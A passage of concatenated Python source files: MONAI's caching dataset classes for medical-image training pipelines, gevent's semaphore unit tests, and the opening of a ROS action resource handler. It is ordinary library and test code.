Dataset with cache mechanism that can load data and cache deterministic transforms' result during training.
By caching the results of non-random preprocessing transforms, it accelerates the training data pipeline.
If the requested data is not in the cache, all transforms will run normally
(see also :py:class:`monai.data.dataset.Dataset`).
Users can set the cache rate or number of items to cache.
It is recommended to experiment with different `cache_num` or `cache_rate` to identify the best training speed.
The transforms which are supposed to be cached must implement the `monai.transforms.Transform`
interface and should not be `Randomizable`. This dataset will cache the outcomes before the first
`Randomizable` `Transform` within a `Compose` instance.
So to improve the caching efficiency, please always put as many as possible non-random transforms
before the randomized ones when composing the chain of transforms.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
For example, if the transform is a `Compose` of::
transforms = Compose([
LoadImaged(),
AddChanneld(),
Spacingd(),
Orientationd(),
ScaleIntensityRanged(),
RandCropByPosNegLabeld(),
ToTensord()
])
when `transforms` is used in a multi-epoch training pipeline, before the first training epoch,
this dataset will cache the results up to ``ScaleIntensityRanged``, as
all non-random transforms `LoadImaged`, `AddChanneld`, `Spacingd`, `Orientationd`, `ScaleIntensityRanged`
can be cached. During training, the dataset will load the cached results and run
``RandCropByPosNegLabeld`` and ``ToTensord``, as ``RandCropByPosNegLabeld`` is a randomized transform
and the outcome not cached.
During training call `set_data()` to update input data and recompute cache content, note that it requires
`persistent_workers=False` in the PyTorch DataLoader.
Note:
`CacheDataset` executes non-random transforms and prepares cache content in the main process before
the first epoch, then all the subprocesses of DataLoader will read the same cache content in the main process
during training. it may take a long time to prepare cache content according to the size of expected cache data.
So to debug or verify the program before real training, users can set `cache_rate=0.0` or `cache_num=0` to
temporarily skip caching.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
cache_num: int = sys.maxsize,
cache_rate: float = 1.0,
num_workers: Optional[int] = None,
progress: bool = True,
copy_cache: bool = True,
) -> None:
"""
Args:
data: input data to load and transform to generate dataset for model.
transform: transforms to execute operations on input data.
cache_num: number of items to be cached. Default is `sys.maxsize`.
will take the minimum of (cache_num, data_length x cache_rate, data_length).
cache_rate: percentage of cached data in total, default is 1.0 (cache all).
will take the minimum of (cache_num, data_length x cache_rate, data_length).
num_workers: the number of worker processes to use.
If num_workers is None then the number returned by os.cpu_count() is used.
progress: whether to display a progress bar.
copy_cache: whether to `deepcopy` the cache content before applying the random transforms,
default to `True`. if the random transforms don't modify the cache content
or every cache item is only used once in a `multi-processing` environment,
may set `copy=False` for better performance.
"""
if not isinstance(transform, Compose):
transform = Compose(transform)
super().__init__(data=data, transform=transform)
self.progress = progress
self.copy_cache = copy_cache
self.cache_num = min(int(cache_num), int(len(data) * cache_rate), len(data))
self.num_workers = num_workers
if self.num_workers is not None:
self.num_workers = max(int(self.num_workers), 1)
self._cache: List = self._fill_cache()
def set_data(self, data: Sequence):
"""
Set the input data and run deterministic transforms to generate cache content.
Note: should call this func after an entire epoch and must set `persistent_workers=False`
in PyTorch DataLoader, because it needs to create new worker processes based on new
generated cache content.
"""
self.data = data
self._cache = self._fill_cache()
def _fill_cache(self) -> List:
if self.cache_num <= 0:
return []
if self.progress and not has_tqdm:
warnings.warn("tqdm is not installed, will not show the caching progress bar.")
with ThreadPool(self.num_workers) as p:
if self.progress and has_tqdm:
return list(
tqdm(
p.imap(self._load_cache_item, range(self.cache_num)),
total=self.cache_num,
desc="Loading dataset",
)
)
return list(p.imap(self._load_cache_item, range(self.cache_num)))
def _load_cache_item(self, idx: int):
"""
Args:
idx: the index of the input data sequence.
"""
item = self.data[idx]
for _transform in self.transform.transforms: # type:ignore
# execute all the deterministic transforms
if isinstance(_transform, Randomizable) or not isinstance(_transform, Transform):
break
_xform = deepcopy(_transform) if isinstance(_transform, ThreadUnsafe) else _transform
item = apply_transform(_xform, item)
return item
def _transform(self, index: int):
if index % len(self) >= self.cache_num: # support negative index
# no cache for this index, execute all the transforms directly
return super()._transform(index)
# load data from cache and execute from the first random transform
start_run = False
if self._cache is None:
self._cache = self._fill_cache()
data = self._cache[index]
if not isinstance(self.transform, Compose):
raise ValueError("transform must be an instance of monai.transforms.Compose.")
for _transform in self.transform.transforms:
if start_run or isinstance(_transform, Randomizable) or not isinstance(_transform, Transform):
# only need to deep copy data on first non-deterministic transform
if not start_run:
start_run = True
if self.copy_cache:
data = deepcopy(data)
data = apply_transform(_transform, data)
return data
class SmartCacheDataset(Randomizable, CacheDataset):
"""
Re-implementation of the SmartCache mechanism in NVIDIA Clara-train SDK.
At any time, the cache pool only keeps a subset of the whole dataset. In each epoch, only the items
in the cache are used for training. This ensures that data needed for training is readily available,
keeping GPU resources busy. Note that cached items may still have to go through a non-deterministic
transform sequence before being fed to GPU. At the same time, another thread is preparing replacement
items by applying the transform sequence to items not in cache. Once one epoch is completed, Smart
Cache replaces the same number of items with replacement items.
Smart Cache uses a simple `running window` algorithm to determine the cache content and replacement items.
Let N be the configured number of objects in cache; and R be the number of replacement objects (R = ceil(N * r),
where r is the configured replace rate).
For more details, please refer to:
https://docs.nvidia.com/clara/tlt-mi/clara-train-sdk-v3.0/nvmidl/additional_features/smart_cache.html#smart-cache
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
For example, if we have 5 images: `[image1, image2, image3, image4, image5]`, and `cache_num=4`, `replace_rate=0.25`.
so the actual training images cached and replaced for every epoch are as below::
epoch 1: [image1, image2, image3, image4]
epoch 2: [image2, image3, image4, image5]
epoch 3: [image3, image4, image5, image1]
epoch 3: [image4, image5, image1, image2]
epoch N: [image[N % 5] ...]
The usage of `SmartCacheDataset` contains 4 steps:
1. Initialize `SmartCacheDataset` object and cache for the first epoch.
2. Call `start()` to run replacement thread in background.
3. Call `update_cache()` before every epoch to replace training items.
4. Call `shutdown()` when training ends.
During training call `set_data()` to update input data and recompute cache content, note to call
`shutdown()` to stop first, then update data and call `start()` to restart.
Note:
This replacement will not work for below cases:
1. Set the `multiprocessing_context` of DataLoader to `spawn`.
2. Run on windows(the default multiprocessing method is `spawn`) with `num_workers` greater than 0.
3. Set the `persistent_workers` of DataLoader to `True` with `num_workers` greater than 0.
If using MONAI workflows, please add `SmartCacheHandler` to the handler list of trainer,
otherwise, please make sure to call `start()`, `update_cache()`, `shutdown()` during training.
Args:
data: input data to load and transform to generate dataset for model.
transform: transforms to execute operations on input data.
replace_rate: percentage of the cached items to be replaced in every epoch.
cache_num: number of items to be cached. Default is `sys.maxsize`.
will take the minimum of (cache_num, data_length x cache_rate, data_length).
cache_rate: percentage of cached data in total, default is 1.0 (cache all).
will take the minimum of (cache_num, data_length x cache_rate, data_length).
num_init_workers: the number of worker threads to initialize the cache for first epoch.
If num_init_workers is None then the number returned by os.cpu_count() is used.
num_replace_workers: the number of worker threads to prepare the replacement cache for every epoch.
If num_replace_workers is None then the number returned by os.cpu_count() is used.
progress: whether to display a progress bar when caching for the first epoch.
shuffle: whether to shuffle the whole data list before preparing the cache content for first epoch.
it will not modify the original input data sequence in-place.
seed: random seed if shuffle is `True`, default to `0`.
copy_cache: whether to `deepcopy` the cache content before applying the random transforms,
default to `True`. if the random transforms don't modify the cache content
or every cache item is only used once in a `multi-processing` environment,
may set `copy=False` for better performance.
"""
def __init__(
self,
data: Sequence,
transform: Union[Sequence[Callable], Callable],
replace_rate: float,
cache_num: int = sys.maxsize,
cache_rate: float = 1.0,
num_init_workers: Optional[int] = None,
num_replace_workers: Optional[int] = None,
progress: bool = True,
shuffle: bool = True,
seed: int = 0,
copy_cache: bool = True,
) -> None:
if shuffle:
self.set_random_state(seed=seed)
data = copy(data)
self.randomize(data)
self.shuffle = shuffle
super().__init__(data, transform, cache_num, cache_rate, num_init_workers, progress, copy_cache)
if self._cache is None:
self._cache = self._fill_cache()
if self.cache_num >= len(data):
warnings.warn(
"cache_num is greater or equal than dataset length, fall back to regular monai.data.CacheDataset."
)
if replace_rate <= 0:
raise ValueError("replace_rate must be greater than 0, otherwise, please use monai.data.CacheDataset.")
self.num_replace_workers: Optional[int] = num_replace_workers
if self.num_replace_workers is not None:
self.num_replace_workers = max(int(self.num_replace_workers), 1)
self._total_num: int = len(data)
self._replace_num: int = min(math.ceil(self.cache_num * replace_rate), len(data) - self.cache_num)
self._replacements: List[Any] = [None for _ in range(self._replace_num)]
self._replace_data_idx: List[int] = list(range(self._replace_num))
self._start_pos: int = 0
self._update_lock: threading.Lock = threading.Lock()
self._round: int = 1
self._replace_done: bool = False
self._replace_mgr: Optional[threading.Thread] = None
self._compute_data_idx()
def set_data(self, data: Sequence):
"""
Set the input data and run deterministic transforms to generate cache content.
Note: should call `shutdown()` before calling this func.
"""
if self.is_started():
warnings.warn("SmartCacheDataset is not shutdown yet, shutdown it directly.")
self.shutdown()
if self.shuffle:
data = copy(data)
self.randomize(data)
super().set_data(data)
def randomize(self, data: Sequence) -> None:
try:
self.R.shuffle(data)
except TypeError as e:
warnings.warn(f"input data can't be shuffled in SmartCacheDataset with numpy.random.shuffle(): {e}.")
def _compute_data_idx(self):
"""
Update the replacement data position in the total data.
"""
for i in range(self._replace_num):
pos: int = self._start_pos + self.cache_num + i
if pos >= self._total_num:
pos -= self._total_num
self._replace_data_idx[i] = pos
def is_started(self):
"""
Check whether the replacement thread is already started.
"""
if self._replace_mgr is None:
return False
return self._replace_mgr.is_alive()
def start(self):
"""
Start the background thread to replace training items for every epoch.
"""
if self._replace_mgr is None or not self.is_started():
self._restart()
def _restart(self):
"""
Restart background thread if killed for some reason.
"""
self._round = 1
self._replace_mgr = threading.Thread(target=self.manage_replacement, daemon=True)
self._replace_mgr.start()
def _try_update_cache(self):
"""
Update the cache items with new replacement for current epoch.
"""
with self._update_lock:
if not self._replace_done:
return False
del self._cache[: self._replace_num]
self._cache.extend(self._replacements)
self._start_pos += self._replace_num
if self._start_pos >= self._total_num:
self._start_pos -= self._total_num
self._compute_data_idx()
# ready for next round
self._round += 1
self._replace_done = False
return True
def update_cache(self):
"""
Update cache items for current epoch, need to call this function before every epoch.
If the cache has been shutdown before, need to restart the `_replace_mgr` thread.
"""
if not self._replace_mgr.is_alive():
self._restart()
# make sure update is done
while not self._try_update_cache():
time.sleep(0.01)
def _try_shutdown(self):
"""
Wait for thread lock to shut down the background thread.
"""
with self._update_lock:
if self._replace_done:
self._round = 0
self._start_pos = 0
self._compute_data_idx()
self._replace_done = False
return True
return False
def shutdown(self):
"""
Shut down the background thread for replacement.
"""
if not self.is_started():
return
# wait until replace mgr is done the current round
while not self._try_shutdown():
time.sleep(0.01)
self._replace_mgr.join()
def _replace_cache_thread(self, index: int):
"""
Execute deterministic transforms on the new data for replacement.
"""
pos: int = self._replace_data_idx[index]
self._replacements[index] = self._load_cache_item(pos)
def _compute_replacements(self):
"""
Compute expected items for the replacement of next epoch, execute deterministic transforms.
It can support multi-threads to accelerate the computation progress.
"""
with ThreadPool(self.num_replace_workers) as p:
p.map(self._replace_cache_thread, list(range(self._replace_num)))
self._replace_done = True
def _try_manage_replacement(self, check_round):
"""
Wait thread lock and replace training items in the background thread.
"""
with self._update_lock:
if self._round <= 0:
# shutdown replacement
self._replace_done = True
return True, -1
if self._round != check_round:
self._compute_replacements()
return False, self._round
def manage_replacement(self):
"""
Background thread for replacement.
"""
check_round: int = -1
done = False
while not done:
done, check_round = self._try_manage_replacement(check_round)
time.sleep(0.01)
def __len__(self):
"""
The dataset length is given by cache_num instead of len(data).
"""
return self.cache_num
class ZipDataset(Dataset):
"""
Zip several PyTorch datasets and output data(with the same index) together in a tuple.
If the output of single dataset is already a tuple, flatten it and extend to the result.
For example: if datasetA returns (img, imgmeta), datasetB returns (seg, segmeta),
finally return (img, imgmeta, seg, segmeta).
And if the datasets don't have same length, use the minimum length of them as the length
of ZipDataset.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
Examples::
>>> zip_data = ZipDataset([[1, 2, 3], [4, 5]])
>>> print(len(zip_data))
2
>>> for item in zip_data:
>>> print(item)
[1, 4]
[2, 5]
"""
def __init__(self, datasets: Sequence, transform: Optional[Callable] = None) -> None:
"""
Args:
datasets: list of datasets to zip together.
transform: a callable data transform operates on the zipped item from `datasets`.
"""
super().__init__(list(datasets), transform=transform)
def __len__(self) -> int:
return min(len(dataset) for dataset in self.data)
def _transform(self, index: int):
def to_list(x):
return list(x) if isinstance(x, (tuple, list)) else [x]
data = []
for dataset in self.data:
data.extend(to_list(dataset[index]))
if self.transform is not None:
data = apply_transform(self.transform, data, map_items=False) # transform the list data
# use tuple instead of list as the default collate_fn callback of MONAI DataLoader flattens nested lists
return tuple(data)
class ArrayDataset(Randomizable, _TorchDataset):
"""
Dataset for segmentation and classification tasks based on array format input data and transforms.
It ensures the same random seeds in the randomized transforms defined for image, segmentation and label.
The `transform` can be :py:class:`monai.transforms.Compose` or any other callable object.
For example:
If train based on Nifti format images without metadata, all transforms can be composed::
img_transform = Compose(
[
LoadImage(image_only=True),
AddChannel(),
RandAdjustContrast()
]
)
ArrayDataset(img_file_list, img_transform=img_transform)
If training based on images and the metadata, the array transforms can not be composed
because several transforms receives multiple parameters or return multiple values. Then Users need
to define their own callable method to parse metadata from `LoadImage` or set `affine` matrix
to `Spacing` transform::
class TestCompose(Compose):
def __call__(self, input_):
img, metadata = self.transforms[0](input_)
img = self.transforms[1](img)
img, _, _ = self.transforms[2](img, metadata["affine"])
return self.transforms[3](img), metadata
img_transform = TestCompose(
[
LoadImage(image_only=False),
AddChannel(),
Spacing(pixdim=(1.5, 1.5, 3.0)),
RandAdjustContrast()
]
)
ArrayDataset(img_file_list, img_transform=img_transform)
Examples::
>>> ds = ArrayDataset([1, 2, 3, 4], lambda x: x + 0.1)
>>> print(ds[0])
1.1
>>> ds = ArrayDataset(img=[1, 2, 3, 4], seg=[5, 6, 7, 8])
>>> print(ds[0])
[1, 5]
"""
def __init__(
self,
img: Sequence,
img_transform: Optional[Callable] = None,
seg: Optional[Sequence] = None,
seg_transform: Optional[Callable] = None,
labels: Optional[Sequence] = None,
label_transform: Optional[Callable] = None,
) -> None:
"""
Initializes the dataset with the filename lists. The transform `img_transform` is applied
to the images and `seg_transform` to the segmentations.
Args:
img: sequence of images.
img_transform: transform to apply to each element in `img`.
seg: sequence of segmentations.
seg_transform: transform to apply to each element in `seg`.
labels: sequence of labels.
label_transform: transform to apply to each element in `labels`.
"""
items = [(img, img_transform), (seg, seg_transform), (labels, label_transform)]
self.set_random_state(seed=get_seed())
datasets = [Dataset(x[0], x[1]) for x in items if x[0] is not None]
self.dataset = datasets[0] if len(datasets) == 1 else ZipDataset(datasets)
self._seed = 0 # transform synchronization seed
def __len__(self) -> int:
return len(self.dataset)
def randomize(self, data: Optional[Any] = None) -> None:
self._seed = self.R.randint(MAX_SEED, dtype="uint32")
def __getitem__(self, index: int):
self.randomize()
if isinstance(self.dataset, ZipDataset):
# set transforms of each zip component
for dataset in self.dataset.data:
transform = getattr(dataset, "transform", None)
if isinstance(transform, Randomizable):
transform.set_random_state(seed=self._seed)
transform = getattr(self.dataset, "transform", None)
if isinstance(transform, Randomizable):
transform.set_random_state(seed=self._seed)
return self.dataset[index]
class NPZDictItemDataset(Dataset):
"""
Represents a dataset from a loaded NPZ file. The members of the file to load are named in the keys of `keys` and
stored under the keyed name. All loaded arrays must have the same 0-dimension (batch) size. Items are always dicts
mapping names to an item extracted from the loaded arrays.
If passing slicing indices, will return a PyTorch Subset, for example: `data: Subset = dataset[1:4]`,
for more details, please check: https://pytorch.org/docs/stable/data.html#torch.utils.data.Subset
Args:
npzfile: Path to .npz file or stream containing .npz file data
keys: Maps keys to load from file to name to store in dataset
transform: Transform to apply to batch dict
other_keys: secondary data to load from file and store in dict `other_keys`, not returned by __getitem__
"""
def __init__(
self,
npzfile: Union[str, IO],
keys: Dict[str, str],
transform: Optional[Callable[..., Dict[str, Any]]] = None,
other_keys: Optional[Sequence[str]] = (),
):
self.npzfile: Union[str, IO] = npzfile if isinstance(npzfile, str) else "STREAM"
self.keys: Dict[str, str] = dict(keys)
dat = np.load(npzfile)
self.arrays = {storedk: dat[datak] for datak, storedk in self.keys.items()}
self.length = self.arrays[first(self.keys.values())].shape[0]
self.other_keys = {} if other_keys is None else {k: dat[k] for k in other_keys}
for k, v in self.arrays.items():
if v.shape[0] != self.length:
raise ValueError(
"All loaded arrays must have the same first dimension "
f"size {self.length}, array `{k}` has size {v.shape[0]}"
)
super().__init__([], transform)
def __len__(self):
return self.length
def _transform(self, index: int):
data = {k: v[index] for k, v in self.arrays.items()}
if not self.transform:
return data
result = apply_transform(self.transform, data)
if isinstance(result, dict) or (isinstance(result, list) and isinstance(result[0], dict)):
return result
raise AssertionError("With a dict supplied to apply_transform, should return a dict or a list of dicts.")
class CSVDataset(Dataset):
"""
Dataset to load data from CSV files and generate a list of dictionaries,
every dictionary maps to a row of the CSV file, and the keys of dictionary
map to the column names of the CSV file.
It can load multiple CSV files and join the tables with additional `kwargs` arg.
Support to only load specific rows and columns.
And it can also group several loaded columns to generate a new column, for example,
set `col_groups={"meta": ["meta_0", "meta_1", "meta_2"]}`, output can be::
[
{"image": "./image0.nii", "meta_0": 11, "meta_1": 12, "meta_2": 13, "meta": [11, 12, 13]},
{"image": "./image1.nii", "meta_0": 21, "meta_1": 22, "meta_2": 23, "meta": [21, 22, 23]},
]
Args:
filename: the filename of expected CSV file to load. if providing a list
of filenames, it will load all the files and join tables.
row_indices: indices of the expected rows to load. it should be a list,
every item can be a int number or a range `[start, end)` for the indices.
for example: `row_indices=[[0, 100], 200, 201, 202, 300]`. if None,
load all the rows in the file.
col_names: names of the expected columns to load. if None, load all the columns.
col_types: `type` and `default value` to convert the loaded columns, if None, use original data.
it should be a dictionary, every item maps to an expected column, the `key` is the column
name and the `value` is None or a dictionary to define the default value and data type.
the supported keys in dictionary are: ["type", "default"]. for example::
col_types = {
"subject_id": {"type": str},
"label": {"type": int, "default": 0},
"ehr_0": {"type": float, "default": 0.0},
"ehr_1": {"type": float, "default": 0.0},
"image": {"type": str, "default": None},
}
col_groups: args to group the loaded columns to generate a new column,
it should be a dictionary, every item maps to a group, the `key` will
be the new column name, the `value` is the names of columns to combine. for example:
`col_groups={"ehr": [f"ehr_{i}" for i in range(10)], "meta": ["meta_1", "meta_2"]}`
transform: transform to apply on the loaded items of a dictionary data.
kwargs: additional arguments for `pandas.merge()` API to join tables.
"""
def __init__(
self,
filename: Union[str, Sequence[str]],
row_indices: Optional[Sequence[Union[int, str]]] = None,
col_names: Optional[Sequence[str]] = None,
col_types: Optional[Dict[str, Optional[Dict[str, Any]]]] = None,
col_groups: Optional[Dict[str, Sequence[str]]] = None,
transform: Optional[Callable] = None,
**kwargs,
):
files = ensure_tuple(filename)
dfs = [pd.read_csv(f) for f in files]
data = convert_tables_to_dicts(
dfs=dfs, row_indices=row_indices, col_names=col_names, col_types=col_types, col_groups=col_groups, **kwargs
)
super().__init__(data=data, transform=transform)
|
test__semaphore.py
|
###
# This file is test__semaphore.py only for organization purposes.
# The public API,
# and the *only* correct place to import Semaphore --- even in tests ---
# is ``gevent.lock``, never ``gevent._semaphore``.
##
from __future__ import print_function
from __future__ import absolute_import
import weakref
import gevent
import gevent.exceptions
from gevent.lock import Semaphore
from gevent.lock import BoundedSemaphore
import gevent.testing as greentest
from gevent.testing import timing
class TestSemaphore(greentest.TestCase):
# issue 39
def test_acquire_returns_false_after_timeout(self):
s = Semaphore(value=0)
result = s.acquire(timeout=0.01)
assert result is False, repr(result)
def test_release_twice(self):
s = Semaphore()
result = []
s.rawlink(lambda s: result.append('a'))
s.release()
s.rawlink(lambda s: result.append('b'))
s.release()
gevent.sleep(0.001)
# The order, though, is not guaranteed.
self.assertEqual(sorted(result), ['a', 'b'])
def test_semaphore_weakref(self):
s = Semaphore()
r = weakref.ref(s)
self.assertEqual(s, r())
@greentest.ignores_leakcheck
def test_semaphore_in_class_with_del(self):
# Issue #704. This used to crash the process
# under PyPy through at least 4.0.1 if the Semaphore
# was implemented with Cython.
class X(object):
def __init__(self):
self.s = Semaphore()
def __del__(self):
self.s.acquire()
X()
import gc
gc.collect()
gc.collect()
def test_rawlink_on_unacquired_runs_notifiers(self):
# https://github.com/gevent/gevent/issues/1287
# Rawlinking a ready semaphore should fire immediately,
# not raise LoopExit
s = Semaphore()
gevent.wait([s])
class TestSemaphoreMultiThread(greentest.TestCase):
# Tests that the object can be acquired correctly across
# multiple threads.
# Used as a base class.
# See https://github.com/gevent/gevent/issues/1437
def _getTargetClass(self):
return Semaphore
def _makeOne(self):
# Create an object that is associated with the current hub. If
# we don't do this now, it gets initialized lazily the first
# time it would have to block, which, in the event of threads,
# would be from an arbitrary thread.
return self._getTargetClass()(1)
def _makeThreadMain(self, thread_running, thread_acquired, sem,
acquired, exc_info,
**thread_acquire_kwargs):
from gevent._hub_local import get_hub_if_exists
import sys
def thread_main():
thread_running.set()
try:
acquired.append(
sem.acquire(**thread_acquire_kwargs)
)
except:
exc_info[:] = sys.exc_info()
raise # Print
finally:
hub = get_hub_if_exists()
if hub is not None:
hub.join()
hub.destroy(destroy_loop=True)
thread_acquired.set()
return thread_main
IDLE_ITERATIONS = 5
def _do_test_acquire_in_one_then_another(self,
release=True,
require_thread_acquired_to_finish=False,
**thread_acquire_kwargs):
from gevent import monkey
self.assertFalse(monkey.is_module_patched('threading'))
import threading
thread_running = threading.Event()
thread_acquired = threading.Event()
sem = self._makeOne()
# Make future acquires block
sem.acquire()
exc_info = []
acquired = []
t = threading.Thread(target=self._makeThreadMain(
thread_running, thread_acquired, sem,
acquired, exc_info,
**thread_acquire_kwargs
))
t.daemon = True
t.start()
thread_running.wait(10) # implausibly large time
if release:
sem.release()
# Spin the loop to be sure the release gets through.
# (Release schedules the notifier to run, and when the
# notifier run it sends the async notification to the
# other thread. Depending on exactly where we are in the
# event loop, and the limit to the number of callbacks
# that get run (including time-based) the notifier may or
# may not be immediately ready to run, so this can take up
# to two iterations.)
for _ in range(self.IDLE_ITERATIONS):
gevent.idle()
if thread_acquired.wait(timing.LARGE_TICK):
break
self.assertEqual(acquired, [True])
if not release and thread_acquire_kwargs.get("timeout"):
# Spin the loop to be sure that the timeout has a chance to
# process. Interleave this with something that drops the GIL
# so the background thread has a chance to notice that.
for _ in range(self.IDLE_ITERATIONS):
gevent.idle()
if thread_acquired.wait(timing.LARGE_TICK):
break
thread_acquired.wait(timing.LARGE_TICK * 5)
if require_thread_acquired_to_finish:
self.assertTrue(thread_acquired.is_set())
try:
self.assertEqual(exc_info, [])
finally:
exc_info = None
return sem, acquired
def test_acquire_in_one_then_another(self):
self._do_test_acquire_in_one_then_another(release=True)
def test_acquire_in_one_then_another_timed(self):
sem, acquired_in_thread = self._do_test_acquire_in_one_then_another(
release=False,
require_thread_acquired_to_finish=True,
timeout=timing.SMALLEST_RELIABLE_DELAY)
self.assertEqual([False], acquired_in_thread)
# This doesn't, of course, notify anything, because
# the waiter has given up.
sem.release()
notifier = getattr(sem, '_notifier', None)
self.assertIsNone(notifier)
def test_acquire_in_one_wait_greenlet_wait_thread_gives_up(self):
# The waiter in the thread both arrives and gives up while
# the notifier is already running...or at least, that's what
# we'd like to arrange, but the _notify_links function doesn't
# drop the GIL/object lock, so the other thread is stuck and doesn't
# actually get to call into the acquire method.
from gevent import monkey
self.assertFalse(monkey.is_module_patched('threading'))
import threading
sem = self._makeOne()
# Make future acquires block
sem.acquire()
def greenlet_one():
ack = sem.acquire()
# We're running in the notifier function right now. It switched to
# us.
thread.start()
gevent.sleep(timing.LARGE_TICK)
return ack
exc_info = []
acquired = []
glet = gevent.spawn(greenlet_one)
thread = threading.Thread(target=self._makeThreadMain(
threading.Event(), threading.Event(),
sem,
acquired, exc_info,
timeout=timing.LARGE_TICK
))
thread.daemon = True
gevent.idle()
sem.release()
glet.join()
for _ in range(3):
gevent.idle()
thread.join(timing.LARGE_TICK)
self.assertEqual(glet.value, True)
self.assertEqual([], exc_info)
self.assertEqual([False], acquired)
self.assertTrue(glet.dead, glet)
glet = None
def assertOneHasNoHub(self, sem):
self.assertIsNone(sem.hub, sem)
@greentest.skipOnPyPyOnWindows("Flaky there; can't reproduce elsewhere")
def test_dueling_threads(self, acquire_args=(), create_hub=None):
# pylint:disable=too-many-locals,too-many-statements
# Threads doing nothing but acquiring and releasing locks, without
# having any other greenlets to switch to.
# https://github.com/gevent/gevent/issues/1698
from gevent import monkey
from gevent._hub_local import get_hub_if_exists
self.assertFalse(monkey.is_module_patched('threading'))
import threading
from time import sleep as native_sleep
sem = self._makeOne()
self.assertOneHasNoHub(sem)
count = 10000
results = [-1, -1]
run = True
def do_it(ix):
if create_hub:
gevent.get_hub()
try:
for i in range(count):
if not run:
break
sem.acquire(*acquire_args)
sem.release()
results[ix] = i
if not create_hub:
# We don't artificially create the hub.
self.assertIsNone(
get_hub_if_exists(),
(get_hub_if_exists(), ix, i)
)
if create_hub and i % 10 == 0:
gevent.sleep(timing.SMALLEST_RELIABLE_DELAY)
elif i % 100 == 0:
native_sleep(timing.SMALLEST_RELIABLE_DELAY)
except Exception as ex: # pylint:disable=broad-except
import traceback; traceback.print_exc()
results[ix] = str(ex)
ex = None
finally:
hub = get_hub_if_exists()
if hub is not None:
hub.join()
hub.destroy(destroy_loop=True)
t1 = threading.Thread(target=do_it, args=(0,))
t1.daemon = True
t2 = threading.Thread(target=do_it, args=(1,))
t2.daemon = True
t1.start()
t2.start()
t1.join(1)
t2.join(1)
while t1.is_alive() or t2.is_alive():
cur = list(results)
t1.join(7)
t2.join(7)
if cur == results:
# Hmm, after two seconds, no progress
run = False
break
self.assertEqual(results, [count - 1, count - 1])
def test_dueling_threads_timeout(self):
self.test_dueling_threads((True, 4))
def test_dueling_threads_with_hub(self):
self.test_dueling_threads(create_hub=True)
# XXX: Need a test with multiple greenlets in a non-primary
# thread. Things should work, just very slowly; instead of moving through
# greenlet.switch(), they'll be moving with async watchers.
class TestBoundedSemaphoreMultiThread(TestSemaphoreMultiThread):
def _getTargetClass(self):
return BoundedSemaphore
@greentest.skipOnPurePython("Needs C extension")
class TestCExt(greentest.TestCase):
def test_c_extension(self):
self.assertEqual(Semaphore.__module__,
'gevent._gevent_c_semaphore')
class SwitchWithFixedHash(object):
# Replaces greenlet.switch with a callable object
# with a hash code we control. This only matters if
# we're hashing this somewhere (which we used to), but
# that doesn't preserve order, so we don't do
# that anymore.
def __init__(self, greenlet, hashcode):
self.switch = greenlet.switch
self.hashcode = hashcode
def __hash__(self):
raise AssertionError
def __eq__(self, other):
raise AssertionError
def __call__(self, *args, **kwargs):
return self.switch(*args, **kwargs)
def __repr__(self):
return repr(self.switch)
class FirstG(gevent.Greenlet):
# A greenlet whose switch method will have a low hashcode.
hashcode = 10
def __init__(self, *args, **kwargs):
gevent.Greenlet.__init__(self, *args, **kwargs)
self.switch = SwitchWithFixedHash(self, self.hashcode)
class LastG(FirstG):
# A greenlet whose switch method will have a high hashcode.
hashcode = 12
def acquire_then_exit(sem, should_quit):
sem.acquire()
should_quit.append(True)
def acquire_then_spawn(sem, should_quit):
if should_quit:
return
sem.acquire()
g = FirstG.spawn(release_then_spawn, sem, should_quit)
g.join()
def release_then_spawn(sem, should_quit):
sem.release()
if should_quit: # pragma: no cover
return
g = FirstG.spawn(acquire_then_spawn, sem, should_quit)
g.join()
class TestSemaphoreFair(greentest.TestCase):
def test_fair_or_hangs(self):
# If the lock isn't fair, this hangs, spinning between
# the last two greenlets.
# See https://github.com/gevent/gevent/issues/1487
sem = Semaphore()
should_quit = []
keep_going1 = FirstG.spawn(acquire_then_spawn, sem, should_quit)
keep_going2 = FirstG.spawn(acquire_then_spawn, sem, should_quit)
exiting = LastG.spawn(acquire_then_exit, sem, should_quit)
with self.assertRaises(gevent.exceptions.LoopExit):
gevent.joinall([keep_going1, keep_going2, exiting])
self.assertTrue(exiting.dead, exiting)
self.assertTrue(keep_going2.dead, keep_going2)
self.assertFalse(keep_going1.dead, keep_going1)
sem.release()
keep_going1.kill()
keep_going2.kill()
exiting.kill()
gevent.idle()
if __name__ == '__main__':
greentest.main()
|
resource_handlers.py
|
#!/usr/bin/python
'''
# =====================================================================
# Abstract resource handlers for ROS Actions and ROS Services
#
# .. Warning:: ROS Services are currently not supported
#
# Author: Marc Sanchez Net
# Date: 05/15/2019
# Copyright (c) 2019, Jet Propulsion Laboratory.
# =====================================================================
'''
# General imports
import abc
from threading import Lock, Semaphore, Thread
from Queue import PriorityQueue
import json
# ROS import
from actionlib import SimpleActionClient
import rospy
from std_msgs.msg import String
# PDRA imports
from pdra.core import Result
# =====================================================================
# === Global variables
# =====================================================================
# Max size for the dispatcher queues. 0 = infinity
MAX_QUEUE_SIZE = 0
# =====================================================================
# === Abstract Resource Handler for ROS Actions
# =====================================================================
class PdraResourceHandlerAction(object):
__metaclass__ = abc.ABCMeta
def __init__(self, dispatcher, agent_id, resource_id, preempt_actions=False):
# Store variables
self.dispatcher = dispatcher
self.agent_id = agent_id
self.resource_id = resource_id
self.current_obligation = None
self.preempt_actions = preempt_actions
self.is_alive = True
self.status_publisher = rospy.Publisher(
'resources_in_execution', String, queue_size=10)
self.status_log_publisher = rospy.Publisher(
'resources_activity_log', String, queue_size=10)
# Create a queue to store new obligations as they arrive
self._queue = PriorityQueue(maxsize=MAX_QUEUE_SIZE)
# Create a semaphore to avoid action preemption of ROS actionlib
self.semaphore = Semaphore(0)
# Create a lock for the current obligation
self.lock = Lock()
# Create client to request services
ac_name = self.action_name()
self.ac = SimpleActionClient(ac_name, self.action_type_cls)
self.ac.wait_for_server()
# Run handler
self.run()
def action_name(self):
